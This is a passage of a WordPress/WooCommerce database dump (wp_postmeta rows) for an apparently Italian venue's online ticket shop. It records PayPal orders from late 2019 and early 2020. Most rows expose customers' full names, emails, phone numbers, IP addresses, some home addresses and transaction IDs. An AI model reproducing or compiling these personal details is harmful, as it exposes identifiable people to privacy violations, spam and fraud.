(iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1'),(20072,932,'_created_via','checkout'),(20073,932,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(20074,932,'_billing_first_name','Mattia'),(20075,932,'_billing_last_name','Bacchiani'),(20076,932,'_billing_email','mattiabacchiani@gmail.com'),(20077,932,'_billing_phone','3318683485'),(20078,932,'_order_currency','EUR'),(20079,932,'_cart_discount','0'),(20080,932,'_cart_discount_tax','0'),(20081,932,'_order_shipping','0.00'),(20082,932,'_order_shipping_tax','0'),(20083,932,'_order_tax','0'),(20084,932,'_order_total','30.00'),(20085,932,'_order_version','3.8.1'),(20086,932,'_prices_include_tax','no'),(20087,932,'_billing_address_index','Mattia Bacchiani        mattiabacchiani@gmail.com 3318683485'),(20088,932,'_shipping_address_index','        '),(20089,932,'is_vat_exempt','no'),(20090,932,'Quanti adulti?','2'),(20091,932,'Numero bambini fino a 6 anni','0'),(20092,932,'Numero ragazzi fino a 14 anni','0'),(20093,932,'Numero ragazzi dai 15 anni in su','0'),(20094,932,'Files attached','[]'),(20095,932,'Payment type','instant'),(20096,932,'_transaction_id','7WP94946RH646124X'),(20097,932,'_paypal_status','completed'),(20098,932,'PayPal Transaction Fee','1.37'),(20099,932,'_date_paid','1577123027'),(20100,932,'_paid_date','2019-12-23 18:43:47'),(20101,932,'_download_permissions_granted','yes'),(20102,932,'_recorded_sales','yes'),(20103,932,'_recorded_coupon_usage_counts','yes'),(20104,932,'_order_stock_reduced','yes'),(20105,933,'_order_key','wc_order_fR2mgGfFTwGDU'),(20106,933,'_customer_user','0'),(20107,933,'_payment_method','paypal'),(20108,933,'_payment_method_title','PayPal'),(20109,933,'_customer_ip_address','87.9.251.6'),(20110,933,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1'),(20111,933,'_created_via','checkout'),(20112,933,'_cart_hash','1ed222f7950d59e46f6abae88a342d0b'),(20113,933,'_billing_first_name','Paola'),(20114,933,'_billing_last_name','Signoretti'),(20115,933,'_billing_city','verona'),(20116,933,'_billing_email','paola.albastella@gmail.com'),(20117,933,'_billing_phone','3458430205'),(20118,933,'_order_currency','EUR'),(20119,933,'_cart_discount','0'),(20120,933,'_cart_discount_tax','0'),(20121,933,'_order_shipping','0.00'),(20122,933,'_order_shipping_tax','0'),(20123,933,'_order_tax','0'),(20124,933,'_order_total','45.00'),(20125,933,'_order_version','3.8.1'),(20126,933,'_prices_include_tax','no'),(20127,933,'_billing_address_index','Paola Signoretti    verona    paola.albastella@gmail.com 3458430205'),(20128,933,'_shipping_address_index','        '),(20129,933,'is_vat_exempt','no'),(20130,933,'Quanti adulti?','3'),(20131,933,'Numero bambini fino a 6 anni','0'),(20132,933,'Numero ragazzi fino a 14 anni','0'),(20133,933,'Numero ragazzi dai 15 anni in su','0'),(20134,933,'Files attached','[]'),(20135,933,'Payment type','instant'),(20136,933,'_transaction_id','1PU40856BE5379448'),(20137,933,'_paypal_status','completed'),(20138,933,'PayPal Transaction Fee','1.88'),(20139,933,'_date_paid','1577517535'),(20140,933,'_paid_date','2019-12-28 08:18:55'),(20141,933,'_download_permissions_granted','yes'),(20142,933,'_recorded_sales','yes'),(20143,933,'_recorded_coupon_usage_counts','yes'),(20144,933,'_order_stock_reduced','yes'),(20145,934,'_order_key','wc_order_mJysEl26YZjbC'),(20146,934,'_customer_user','0'),(20147,934,'_payment_method','paypal'),(20148,934,'_payment_method_title','PayPal'),(20149,934,'_customer_ip_address','95.238.198.30'),(20150,934,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(20151,934,'_created_via','checkout'),(20152,934,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(20153,934,'_billing_first_name','Vincenzo'),(20154,934,'_billing_last_name','Giavoni'),(20155,934,'_billing_email','andrea_giavoni@hotmail.it'),(20156,934,'_billing_phone','335249099'),(20157,934,'_order_currency','EUR'),(20158,934,'_cart_discount','0'),(20159,934,'_cart_discount_tax','0'),(20160,934,'_order_shipping','0.00'),(20161,934,'_order_shipping_tax','0'),(20162,934,'_order_tax','0'),(20163,934,'_order_total','30.00'),(20164,934,'_order_version','3.8.1'),(20165,934,'_prices_include_tax','no'),(20166,934,'_billing_address_index','Vincenzo Giavoni        andrea_giavoni@hotmail.it 335249099'),(20167,934,'_shipping_address_index','        '),(20168,934,'is_vat_exempt','no'),(20169,934,'Quanti adulti?','2'),(20170,934,'Numero bambini fino a 6 anni','0');
INSERT INTO `wp_postmeta` VALUES (20171,934,'Numero ragazzi fino a 14 anni','0'),(20172,934,'Numero ragazzi dai 15 anni in su','0'),(20173,934,'Files attached','[]'),(20174,934,'Payment type','instant'),(20175,934,'_transaction_id','5RY1336879803442V'),(20176,934,'_paypal_status','completed'),(20177,934,'PayPal Transaction Fee','1.37'),(20178,934,'_date_paid','1577552547'),(20179,934,'_paid_date','2019-12-28 18:02:27'),(20180,934,'_download_permissions_granted','yes'),(20181,934,'_recorded_sales','yes'),(20182,934,'_recorded_coupon_usage_counts','yes'),(20183,934,'_order_stock_reduced','yes'),(20184,935,'_order_currency','EUR'),(20185,935,'_cart_discount','0'),(20186,935,'_cart_discount_tax','0'),(20187,935,'_order_shipping','0'),(20188,935,'_order_shipping_tax','0'),(20189,935,'_order_tax','0'),(20190,935,'_order_total','-30.00'),(20191,935,'_order_version','3.8.1'),(20192,935,'_prices_include_tax','no'),(20193,935,'_refund_amount','30'),(20194,935,'_refunded_by','1'),(20195,935,'_refunded_payment',''),(20196,935,'_refund_reason','Ordine completamente rimborsato.'),(20197,936,'_order_key','wc_order_o8ezB0wBIEUIU'),(20198,936,'_customer_user','0'),(20199,936,'_payment_method','paypal'),(20200,936,'_payment_method_title','PayPal'),(20201,936,'_customer_ip_address','77.242.213.198'),(20202,936,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1'),(20203,936,'_created_via','checkout'),(20204,936,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20205,936,'_billing_first_name','Luca'),(20206,936,'_billing_last_name','De Luigi'),(20207,936,'_billing_email','deluj7006@gmail.com'),(20208,936,'_billing_phone','3479519530'),(20209,936,'_order_currency','EUR'),(20210,936,'_cart_discount','0'),(20211,936,'_cart_discount_tax','0'),(20212,936,'_order_shipping','0.00'),(20213,936,'_order_shipping_tax','0'),(20214,936,'_order_tax','0'),(20215,936,'_order_total','30.00'),(20216,936,'_order_version','3.8.1'),(20217,936,'_prices_include_tax','no'),(20218,936,'_billing_address_index','Luca De Luigi        deluj7006@gmail.com 3479519530'),(20219,936,'_shipping_address_index','        '),(20220,936,'is_vat_exempt','no'),(20221,936,'Quanti adulti?','2'),(20222,936,'Numero bambini fino a 6 anni','0'),(20223,936,'Numero ragazzi fino a 14 anni','0'),(20224,936,'Numero ragazzi dai 15 anni in su','0'),(20225,936,'Files attached','[]'),(20226,936,'Payment type','instant'),(20227,936,'_transaction_id','6PN73815923916231'),(20228,936,'_paypal_status','completed'),(20229,936,'PayPal Transaction Fee','1.37'),(20230,936,'_date_paid','1580037276'),(20231,936,'_paid_date','2020-01-26 12:14:36'),(20232,936,'_download_permissions_granted','yes'),(20233,936,'_recorded_sales','yes'),(20234,936,'_recorded_coupon_usage_counts','yes'),(20235,936,'_order_stock_reduced','yes'),(20242,943,'_edit_lock','1580470024:1'),(20243,943,'_edit_last','1'),(20244,944,'_wp_attached_file','2020/01/solymar-14-febbraio.jpg'),(20245,944,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1440;s:6:\"height\";i:1440;s:4:\"file\";s:31:\"2020/01/solymar-14-febbraio.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"solymar-14-febbraio-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"solymar-14-febbraio-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-830x830.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:830;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"solymar-14-febbraio-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"solymar-14-febbraio-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20246,943,'_thumbnail_id','944'),(20247,943,'_wp_page_template','default'),(20250,943,'_yoast_wpseo_content_score','90'),(20251,943,'_yoast_wpseo_primary_category','1'),(20252,288,'_enable_np_sticker',''),(20253,288,'_np_no_of_days',''),(20254,288,'_np_sticker_pos',''),(20255,288,'_np_sticker_type',''),(20256,288,'_np_sticker_custom_id',''),(20257,288,'_enable_pos_sticker',''),(20258,288,'_pos_sticker_pos',''),(20259,288,'_pos_sticker_type',''),(20260,288,'_pos_sticker_custom_id',''),(20261,288,'_enable_sop_sticker',''),(20262,288,'_sop_sticker_pos',''),(20263,288,'_sop_sticker_type',''),(20264,288,'_sop_sticker_custom_id',''),(20265,290,'_enable_np_sticker',''),(20266,290,'_np_no_of_days',''),(20267,290,'_np_sticker_pos',''),(20268,290,'_np_sticker_type',''),(20269,290,'_np_sticker_custom_id',''),(20270,290,'_enable_pos_sticker',''),(20271,290,'_pos_sticker_pos',''),(20272,290,'_pos_sticker_type',''),(20273,290,'_pos_sticker_custom_id',''),(20274,290,'_enable_sop_sticker',''),(20275,290,'_sop_sticker_pos',''),(20276,290,'_sop_sticker_type',''),(20277,290,'_sop_sticker_custom_id',''),(20278,949,'_order_key','wc_order_VhvoPgndHHoV2'),(20279,949,'_customer_user','0'),(20280,949,'_payment_method','paypal'),(20281,949,'_payment_method_title','PayPal'),(20282,949,'_customer_ip_address','77.242.218.15'),(20283,949,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0'),(20284,949,'_created_via','checkout'),(20285,949,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20286,949,'_billing_first_name','Andrea'),(20287,949,'_billing_last_name','Candini'),(20288,949,'_billing_email','formulauff@gmail.com'),(20289,949,'_billing_phone','3498535612'),(20290,949,'_order_currency','EUR'),(20291,949,'_cart_discount','0'),(20292,949,'_cart_discount_tax','0'),(20293,949,'_order_shipping','0.00'),(20294,949,'_order_shipping_tax','0'),(20295,949,'_order_tax','0'),(20296,949,'_order_total','30.00'),(20297,949,'_order_version','3.9.1'),(20298,949,'_prices_include_tax','no'),(20299,949,'_billing_address_index','Andrea Candini        formulauff@gmail.com 3498535612'),(20300,949,'_shipping_address_index','        '),(20301,949,'is_vat_exempt','no'),(20302,949,'Quanti adulti?','2'),(20303,949,'Numero bambini fino a 6 anni','0'),(20304,949,'Numero ragazzi fino a 14 anni','0'),(20305,949,'Numero ragazzi dai 15 anni in su','0'),(20306,949,'Files attached','[]'),(20307,949,'Payment type','instant'),(20308,949,'_transaction_id','03E084217E6264423'),(20309,949,'_paypal_status','completed'),(20310,949,'PayPal Transaction Fee','1.37'),(20311,949,'_date_paid','1580578861'),(20312,949,'_paid_date','2020-02-01 18:41:01'),(20313,949,'_download_permissions_granted','yes'),(20314,949,'_recorded_sales','yes'),(20315,949,'_recorded_coupon_usage_counts','yes'),(20316,949,'_order_stock_reduced','yes'),(20317,950,'_order_key','wc_order_i26VOsRuGGBbC'),(20318,950,'_customer_user','0'),(20319,950,'_payment_method','paypal'),(20320,950,'_payment_method_title','PayPal'),(20321,950,'_customer_ip_address','47.53.221.237'),(20322,950,'_customer_user_agent','Mozilla/5.0 (Linux; Android 7.0; PRA-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),(20323,950,'_created_via','checkout'),(20324,950,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20325,950,'_billing_first_name','silvia'),(20326,950,'_billing_last_name','winter'),(20327,950,'_billing_address_1','via f.li bandiera 45'),(20328,950,'_billing_city','riccione'),(20329,950,'_billing_email','wintersilvia88@gmail.com'),(20330,950,'_billing_phone','3471131393'),(20331,950,'_order_currency','EUR'),(20332,950,'_cart_discount','0'),(20333,950,'_cart_discount_tax','0'),(20334,950,'_order_shipping','0.00'),(20335,950,'_order_shipping_tax','0'),(20336,950,'_order_tax','0'),(20337,950,'_order_total','30.00'),(20338,950,'_order_version','3.9.1'),(20339,950,'_prices_include_tax','no'),(20340,950,'_billing_address_index','silvia winter  via f.li bandiera 45  riccione    wintersilvia88@gmail.com 3471131393'),(20341,950,'_shipping_address_index','        '),(20342,950,'is_vat_exempt','no'),(20343,950,'Quanti adulti?','2'),(20344,950,'Numero bambini fino a 6 anni','0'),(20345,950,'Numero ragazzi fino a 14 anni','0'),(20346,950,'Numero ragazzi dai 15 anni in su','0'),(20347,950,'Files attached','[]'),(20348,950,'Payment type','instant'),(20349,950,'_transaction_id','2FW28398NT156344L'),(20350,950,'_paypal_status','completed'),(20351,950,'PayPal Transaction Fee','1.37'),(20352,950,'_date_paid','1580743368'),(20353,950,'_paid_date','2020-02-03 16:22:48'),(20354,950,'_download_permissions_granted','yes'),(20355,950,'_recorded_sales','yes'),(20356,950,'_recorded_coupon_usage_counts','yes'),(20357,950,'_order_stock_reduced','yes'),(20358,951,'_order_key','wc_order_JxDVqqeK5qSxs'),(20359,951,'_customer_user','0'),(20360,951,'_payment_method','paypal'),(20361,951,'_payment_method_title','PayPal'),(20362,951,'_customer_ip_address','213.159.26.82'),(20363,951,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15'),(20364,951,'_created_via','checkout'),(20365,951,'_cart_hash','29d007bc76532f5364dbb883edb710ed'),(20366,951,'_billing_first_name','Tommaso'),(20367,951,'_billing_last_name','D\'Angelo'),(20368,951,'_billing_email','tommy_95_6@live.it'),(20369,951,'_billing_phone','3886938298'),(20370,951,'_order_currency','EUR'),(20371,951,'_cart_discount','0'),(20372,951,'_cart_discount_tax','0'),(20373,951,'_order_shipping','0.00'),(20374,951,'_order_shipping_tax','0'),(20375,951,'_order_tax','0'),(20376,951,'_order_total','100.00'),(20377,951,'_order_version','3.9.1'),(20378,951,'_prices_include_tax','no'),(20379,951,'_billing_address_index','Tommaso D\'Angelo        tommy_95_6@live.it 3886938298'),(20380,951,'_shipping_address_index','        '),(20381,951,'is_vat_exempt','no'),(20382,951,'Quanti adulti?','2'),(20383,951,'Numero bambini fino a 6 anni','0'),(20384,951,'Numero ragazzi fino a 14 anni','0'),(20385,951,'Numero ragazzi dai 15 anni in su','0'),(20386,951,'Files attached','[]'),(20387,951,'Payment type','instant'),(20388,951,'_transaction_id','9S214324XB8783345'),(20389,951,'_paypal_status','completed'),(20390,951,'PayPal Transaction Fee','3.75'),(20391,951,'_date_paid','1580851372'),(20392,951,'_paid_date','2020-02-04 22:22:52'),(20393,951,'_download_permissions_granted','yes'),(20394,951,'_recorded_sales','yes'),(20395,951,'_recorded_coupon_usage_counts','yes'),(20396,951,'_order_stock_reduced','yes'),(20397,952,'discount_type','fixed_cart'),(20398,952,'coupon_amount','100'),(20399,952,'individual_use','no'),(20400,952,'usage_limit','1'),(20401,952,'date_expires','1596326400'),(20402,952,'apply_before_tax','no'),(20403,952,'free_shipping','yes'),(20404,952,'minimum_amount',''),(20405,952,'maximum_amount',''),(20406,952,'exclude_sale_items','no'),(20407,952,'exclude_product_ids',''),(20408,952,'exclude_product_categories',''),(20409,952,'product_ids',''),(20410,952,'product_categories','a:0:{}'),(20411,952,'mwb_wgm_giftcard_coupon','951'),(20412,952,'mwb_wgm_giftcard_coupon_unique','online'),(20413,952,'mwb_wgm_giftcard_coupon_product_id','548'),(20414,952,'mwb_wgm_giftcard_coupon_mail_to','Leonarda e Giorgio'),(20415,951,'951#364','a:1:{i:0;s:18:\"solymarcoupon4IHCG\";}'),(20416,951,'mwb_wgm_order_giftcard','send'),(20417,953,'_order_key','wc_order_Mmi6wBmOVGnog'),(20418,953,'_customer_user','59'),(20419,953,'_payment_method','paypal'),(20420,953,'_payment_method_title','PayPal'),(20421,953,'_customer_ip_address','93.40.213.172'),(20422,953,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15'),(20423,953,'_created_via','checkout'),(20424,953,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(20425,953,'_billing_first_name','Mattia'),(20426,953,'_billing_last_name','Biografi'),(20427,953,'_billing_address_1','via sant\'agata feltria 12'),(20428,953,'_billing_city','Rimini'),(20429,953,'_billing_email','mattiabio@hotmail.it'),(20430,953,'_billing_phone','3398654137'),(20431,953,'_order_currency','EUR'),(20432,953,'_cart_discount','0'),(20433,953,'_cart_discount_tax','0'),(20434,953,'_order_shipping','0.00'),(20435,953,'_order_shipping_tax','0'),(20436,953,'_order_tax','0'),(20437,953,'_order_total','30.00'),(20438,953,'_order_version','3.9.1'),(20439,953,'_prices_include_tax','no'),(20440,953,'_billing_address_index','Mattia Biografi  via sant\'agata feltria 12  Rimini    mattiabio@hotmail.it 3398654137'),(20441,953,'_shipping_address_index','        '),(20442,953,'is_vat_exempt','no'),(20443,953,'Quanti adulti?','2'),(20444,953,'Numero bambini fino a 6 anni','0'),(20445,953,'Numero ragazzi fino a 14 anni','0'),(20446,953,'Numero ragazzi dai 15 anni in su','0'),(20447,953,'Files attached','[]'),(20448,953,'Payment type','instant'),(20449,953,'_transaction_id','1BP318820W986111P'),(20450,953,'_paypal_status','completed'),(20451,953,'PayPal Transaction Fee','1.37'),(20452,953,'_date_paid','1580932005'),(20453,953,'_paid_date','2020-02-05 20:46:45'),(20454,953,'_download_permissions_granted','yes'),(20455,953,'_recorded_sales','yes'),(20456,953,'_recorded_coupon_usage_counts','yes'),(20457,953,'_order_stock_reduced','yes'),(20458,954,'_order_key','wc_order_XrB1KXYOKlQVS'),(20459,954,'_customer_user','43'),(20460,954,'_payment_method','paypal'),(20461,954,'_payment_method_title','PayPal'),(20462,954,'_customer_ip_address','62.220.84.44'),(20463,954,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(20464,954,'_created_via','checkout'),(20465,954,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20466,954,'_billing_first_name','Alex'),(20467,954,'_billing_last_name','Ronchi'),(20468,954,'_billing_address_1','Via Riva del Garda, 15'),(20469,954,'_billing_city','Riccione'),(20470,954,'_billing_email','alex_93_5300@hotmail.it'),(20471,954,'_billing_phone','3392914713'),(20472,954,'_order_currency','EUR'),(20473,954,'_cart_discount','0'),(20474,954,'_cart_discount_tax','0'),(20475,954,'_order_shipping','0.00'),(20476,954,'_order_shipping_tax','0'),(20477,954,'_order_tax','0'),(20478,954,'_order_total','30.00'),(20479,954,'_order_version','3.9.1'),(20480,954,'_prices_include_tax','no'),(20481,954,'_billing_address_index','Alex Ronchi  Via Riva del Garda, 15  Riccione    alex_93_5300@hotmail.it 3392914713'),(20482,954,'_shipping_address_index','        '),(20483,954,'is_vat_exempt','no'),(20484,954,'Quanti adulti?','2'),(20485,954,'Numero bambini fino a 6 anni','0'),(20486,954,'Numero ragazzi fino a 14 anni','0'),(20487,954,'Numero ragazzi dai 15 anni in su','0'),(20488,954,'Files attached','[]'),(20489,954,'Payment type','instant'),(20490,954,'_transaction_id','1H729614E7959321E'),(20491,954,'_paypal_status','completed'),(20492,954,'PayPal Transaction Fee','1.37'),(20493,954,'_date_paid','1581006159'),(20494,954,'_paid_date','2020-02-06 17:22:39'),(20495,954,'_download_permissions_granted','yes'),(20496,954,'_recorded_sales','yes'),(20497,954,'_recorded_coupon_usage_counts','yes'),(20498,954,'_order_stock_reduced','yes'),(20499,955,'_order_key','wc_order_A3L2DKCBniiol'),(20500,955,'_customer_user','0'),(20501,955,'_payment_method','paypal'),(20502,955,'_payment_method_title','PayPal'),(20503,955,'_customer_ip_address','93.144.238.108'),(20504,955,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(20505,955,'_created_via','checkout'),(20506,955,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20507,955,'_billing_first_name','Giacomo'),(20508,955,'_billing_last_name','Torchi'),(20509,955,'_billing_address_1','giacomotorchi@gmail.com'),(20510,955,'_billing_city','Bologna'),(20511,955,'_billing_email','giacomotorchi@gmail.com'),(20512,955,'_billing_phone','3382297984'),(20513,955,'_order_currency','EUR'),(20514,955,'_cart_discount','0'),(20515,955,'_cart_discount_tax','0'),(20516,955,'_order_shipping','0.00'),(20517,955,'_order_shipping_tax','0'),(20518,955,'_order_tax','0'),(20519,955,'_order_total','30.00'),(20520,955,'_order_version','3.9.1'),(20521,955,'_prices_include_tax','no'),(20522,955,'_billing_address_index','Giacomo Torchi  giacomotorchi@gmail.com  Bologna    giacomotorchi@gmail.com 3382297984'),(20523,955,'_shipping_address_index','        '),(20524,955,'is_vat_exempt','no'),(20525,955,'Quanti adulti?','2'),(20526,955,'Numero bambini fino a 6 anni','0'),(20527,955,'Numero ragazzi fino a 14 anni','0'),(20528,955,'Numero ragazzi dai 15 anni in su','0'),(20529,955,'Files attached','[]'),(20530,955,'Payment type','instant'),(20531,955,'_transaction_id','38B19884FR158540H'),(20532,955,'_paypal_status','completed'),(20533,955,'PayPal Transaction Fee','1.37'),(20534,955,'_date_paid','1581072800'),(20535,955,'_paid_date','2020-02-07 11:53:20'),(20536,955,'_download_permissions_granted','yes'),(20537,955,'_recorded_sales','yes'),(20538,955,'_recorded_coupon_usage_counts','yes'),(20539,955,'_order_stock_reduced','yes'),(20540,956,'_order_key','wc_order_fe4frIpebCOpA'),(20541,956,'_customer_user','60'),(20542,956,'_payment_method','paypal'),(20543,956,'_payment_method_title','PayPal'),(20544,956,'_customer_ip_address','2.224.174.131'),(20545,956,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15'),(20546,956,'_created_via','checkout'),(20547,956,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20548,956,'_billing_first_name','Tommaso'),(20549,956,'_billing_last_name','Stefanini'),(20550,956,'_billing_email','tommasostefanini@libero.it'),(20551,956,'_billing_phone','3338462773'),(20552,956,'_order_currency','EUR'),(20553,956,'_cart_discount','0'),(20554,956,'_cart_discount_tax','0'),(20555,956,'_order_shipping','0.00'),(20556,956,'_order_shipping_tax','0'),(20557,956,'_order_tax','0'),(20558,956,'_order_total','30.00'),(20559,956,'_order_version','3.9.1'),(20560,956,'_prices_include_tax','no'),(20561,956,'_billing_address_index','Tommaso Stefanini        tommasostefanini@libero.it 3338462773'),(20562,956,'_shipping_address_index','        '),(20563,956,'is_vat_exempt','no'),(20564,956,'Quanti adulti?','1'),(20565,956,'Numero bambini fino a 6 anni','0'),(20566,956,'Numero ragazzi fino a 14 anni','0'),(20567,956,'Numero ragazzi dai 15 anni in su','0'),(20568,956,'Files attached','[]'),(20569,956,'Payment type','instant'),(20570,956,'_transaction_id','0E979080X2559405A'),(20571,956,'_paypal_status','completed'),(20572,956,'PayPal Transaction Fee','1.37'),(20573,956,'_date_paid','1581245188'),(20574,956,'_paid_date','2020-02-09 11:46:28'),(20575,956,'_download_permissions_granted','yes'),(20576,956,'_recorded_sales','yes'),(20577,956,'_recorded_coupon_usage_counts','yes'),(20578,956,'_order_stock_reduced','yes'),(20579,957,'_order_key','wc_order_mFoEBD6gav1Ej'),(20580,957,'_customer_user','0'),(20581,957,'_payment_method','paypal'),(20582,957,'_payment_method_title','PayPal'),(20583,957,'_customer_ip_address','77.242.218.229'),(20584,957,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15'),(20585,957,'_created_via','checkout'),(20586,957,'_cart_hash','deb820194fc231bd7908adffd39ff9d2'),(20587,957,'_billing_first_name','roberto'),(20588,957,'_billing_last_name','moretti'),(20589,957,'_billing_email','moghe@fun4all.it'),(20590,957,'_billing_phone','3358744962'),(20591,957,'_order_currency','EUR'),(20592,957,'_cart_discount','0'),(20593,957,'_cart_discount_tax','0'),(20594,957,'_order_shipping','0.00'),(20595,957,'_order_shipping_tax','0'),(20596,957,'_order_tax','0'),(20597,957,'_order_total','120.00'),(20598,957,'_order_version','3.9.1'),(20599,957,'_prices_include_tax','no'),(20600,957,'_billing_address_index','roberto moretti        moghe@fun4all.it 3358744962'),(20601,957,'_shipping_address_index','        '),(20602,957,'is_vat_exempt','no'),(20603,957,'Quanti adulti?','1'),(20604,957,'Numero bambini fino a 6 anni','0'),(20605,957,'Numero ragazzi fino a 14 anni','0'),(20606,957,'Numero ragazzi dai 15 anni in su','0'),(20607,957,'Files attached','[]'),(20608,957,'Payment type','instant'),(20609,957,'_transaction_id','5P6739869C030052C'),(20610,957,'_paypal_status','completed'),(20611,957,'PayPal Transaction Fee','4.43'),(20612,957,'_date_paid','1581266138'),(20613,957,'_paid_date','2020-02-09 17:35:38'),(20614,957,'_download_permissions_granted','yes'),(20615,957,'_recorded_sales','yes'),(20616,957,'_recorded_coupon_usage_counts','yes'),(20617,957,'_order_stock_reduced','yes'),(20618,958,'_order_key','wc_order_0kfK2IJLnVkKJ'),(20619,958,'_customer_user','0'),(20620,958,'_payment_method','paypal'),(20621,958,'_payment_method_title','PayPal'),(20622,958,'_customer_ip_address','91.253.36.137'),(20623,958,'_customer_user_agent','Mozilla/5.0 (Linux; Android 9; Redmi 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Mobile 